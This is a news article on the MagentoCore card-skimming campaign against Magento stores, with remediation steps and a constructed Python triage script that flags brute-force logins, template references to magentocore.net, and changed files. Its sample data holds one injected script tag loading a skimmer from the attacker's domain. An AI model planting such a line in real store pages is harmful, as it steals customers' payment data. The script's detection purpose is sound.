- Security researcher Willem de Groot discovered a hacking campaign targeting e-commerce websites running Magento.
- The campaign has already infected 7339 e-commerce sites in the last 6 months.
- Attackers use a payment-skimming malware named MagentoCore to infect the websites.
- The campaign is still ongoing and has been infecting 50-60 stores per day.
Security researchers have discovered a massive hacking campaign targeting Magento stores with a payment-skimming malware named MagentoCore.
The skimmer steals the payment card data of customers who purchase on infected sites, and it has already infected 7339 e-commerce sites in the last 6 months.
The campaign was discovered by security researcher Willem de Groot, who said: “The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their card and identity stolen.”
How the MagentoCore Malware Works
The attackers first gain access to the control panel of an e-commerce site by brute-forcing its login.
Once access is gained, they inject a malicious script into the HTML template. The script records all keystrokes of customers on the site and sends them to a magentocore.net server registered in Moscow.
The data captured this way includes usernames, passwords, payment card data and other personal details.
The malware also includes a recovery mechanism: in the case of Magento, it adds a backdoor to cron.php that downloads the malicious code again and then deletes itself, leaving no traces of the process.
According to the researcher, the campaign is still ongoing and has been infecting 50-60 stores per day.
What to Do if You Are Infected with the MagentoCore Malware
- First, find out how the attackers gained unauthorized access to your site. You can do this by analyzing the backend access logs.
- After finding the entry point, look for backdoors installed on your site and for unauthorized modifications to your codebase.
- Then close all unauthorized access points at once.
- After that, remove the skimmer, the backdoor and any other malicious code, and revert to a certified safe copy of the codebase.
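The four remediation steps above, together with the mechanism described in the previous section, as an added Python triage example that is not part of the original article or of the researcher's tooling. It assumes a combined-format backend access log, a backend login path of /admin, a cut-off of 20 login POSTs per IP for flagging brute forcing, and a manifest of SHA-256 hashes taken from the certified safe copy; the only indicator taken from the article is the magentocore.net domain, and every sample log line, file content and hash below is constructed.

```python
"""Triage helpers for a suspected MagentoCore infection (constructed example).

Three checks, matching the remediation steps in the article:
  1. find the entry point: IPs that hammered the admin login in the access log;
  2. find the injection: templates that reference the exfiltration domain;
  3. find unauthorized modifications: files whose hash differs from the
     certified safe copy, which are the removal / revert candidates.
"""
import hashlib
import re
from collections import Counter

# Indicator taken from the article: stolen keystrokes are posted to this host.
EXFIL_DOMAIN = "magentocore.net"

# Assumed backend login path; adjust to the store's real admin URL.
ADMIN_LOGIN_PATH = "/admin"

# Combined log format: client IP, then method and path of the request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)')


def count_admin_login_posts(log_lines):
    """Count POST requests to the admin login path per client IP."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].startswith(ADMIN_LOGIN_PATH):
            counts[m["ip"]] += 1
    return counts


def brute_force_suspects(log_lines, threshold=20):
    """IPs whose admin login POST count reaches the (assumed) threshold."""
    counts = count_admin_login_posts(log_lines)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def find_exfil_references(template_text):
    """1-based line numbers of a template that mention the exfiltration domain."""
    return [i for i, line in enumerate(template_text.splitlines(), 1)
            if EXFIL_DOMAIN in line.lower()]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def unauthorized_changes(current_files, certified_manifest):
    """Compare the live codebase with hashes of the certified safe copy.

    current_files: {relative path: file bytes}
    certified_manifest: {relative path: sha256 hex digest}
    Returns modified and added paths; anything listed is a candidate for
    removal or for reverting to the certified copy.
    """
    modified = sorted(p for p, data in current_files.items()
                      if p in certified_manifest
                      and sha256_hex(data) != certified_manifest[p])
    added = sorted(p for p in current_files if p not in certified_manifest)
    return {"modified": modified, "added": added}


# Constructed sample data: documentation-range IPs, invented timestamps.
SAMPLE_LOG = (
    ['203.0.113.9 - - [10/Sep/2018:08:01:%02d +0000] "POST /admin HTTP/1.1" 200 512' % s
     for s in range(25)]
    + ['198.51.100.4 - - [10/Sep/2018:08:05:00 +0000] "GET /checkout/cart HTTP/1.1" 200 2048',
       '198.51.100.4 - - [10/Sep/2018:08:05:10 +0000] "POST /admin HTTP/1.1" 302 0']
)

CLEAN_FOOTER = "<footer>\n<p>Thanks for shopping</p>\n</footer>\n"
# Constructed injected line; the script name is an assumption, only the host is from the article.
INFECTED_FOOTER = CLEAN_FOOTER + '<script src="https://magentocore.net/skimmer.js"></script>\n'

CERTIFIED_MANIFEST = {
    "app/design/footer.phtml": sha256_hex(CLEAN_FOOTER.encode()),
    "cron.php": sha256_hex(b"<?php // certified cron bootstrap\n"),
}
LIVE_FILES = {
    "app/design/footer.phtml": INFECTED_FOOTER.encode(),
    "cron.php": b"<?php // certified cron bootstrap\n",
    "skin/frontend/.cache.php": b"<?php // file not present in the certified copy\n",
}

if __name__ == "__main__":
    print("brute-force suspects:", brute_force_suspects(SAMPLE_LOG))
    print("skimmer reference lines:", find_exfil_references(INFECTED_FOOTER))
    print("changes vs certified copy:", unauthorized_changes(LIVE_FILES, CERTIFIED_MANIFEST))
```

On a real store, feed the functions the actual access log and a hash manifest generated from the certified copy before the incident; the brute-force threshold and login path are the two assumptions that most need adjusting to the site's own traffic.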
For more details, you can visit the analysis published by the researcher here.